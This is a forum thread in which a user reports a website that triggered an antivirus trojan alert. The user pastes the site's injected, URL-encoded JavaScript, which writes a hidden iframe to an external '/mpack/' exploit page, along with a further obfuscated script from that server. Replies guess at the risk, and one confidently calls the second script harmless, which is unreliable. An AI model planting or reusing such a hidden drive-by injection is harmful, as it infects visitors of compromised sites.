www.batmantasarim.com (please do not visit with IE) I visited this site with FF, saw nothing so I thought I would try it with IE. avast! antivirus didn't alert me but Kaspersky gives an alert when you enter to the page about some trojan downloader. Then when I looked at the source code I saw some encrypted JS code; <script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script> Code (markup): I decoded this with a tool and saw this; eval(unescape("document.write("<iframe src=\"http://81.95.150.82/mpack/index.php\" width=0 height=0 style=\"display:none\"></iframe> Code (markup): Which means it's a hidden iframe code for "http://81.95.150.82/mpack/index.php" Now of course, I went to that site too and checked its source code and saw; <html><head><script language="JavaScript">function decipher(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,27,3,40,43,13,38,60,62,44,0,0,0,0,0,0,35,10,45,37,18,23,21,7,53,50,2,4,25,55,29,1,52,33,19,6,51,36,26,34,57,42,5,0,0,0,0,46,0,39,11,8,9,58,41,56,24,59,61,17,47,16,22,14,20,30,15,28,12,54,49,31,48,32,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decipher("Z6LTk@sI16XvAGtM1S5xnGNQFR9xzafWG4sxslL6AusPca76")</script></head><body>test page</body></html> Code (markup): I have no idea what this is but it seems fishy. I wanna make sure I didn't get any kind of trojan as I have really private things stored in my computer + all my logins are under threat. Does anyone clarify this?
The code with decipher function seems no problematic, because is using only a document.write javacript function. Launching that javascript code will display "test page" string on window (is apearing twice because is on html body too).
It said "Sorry! You IP blocked." when I went to the page. I still don't understand why batmantasarim.com's mainpage alerts Kaspersky though.
I got the same thing on my site. It's getting script from the other server than yours. But it's really seems to be some kind of trojan
very good chance that your computer is now a zombie computer now serving the same thing just reformat your computer and start again to be completely safe and don't use ie again..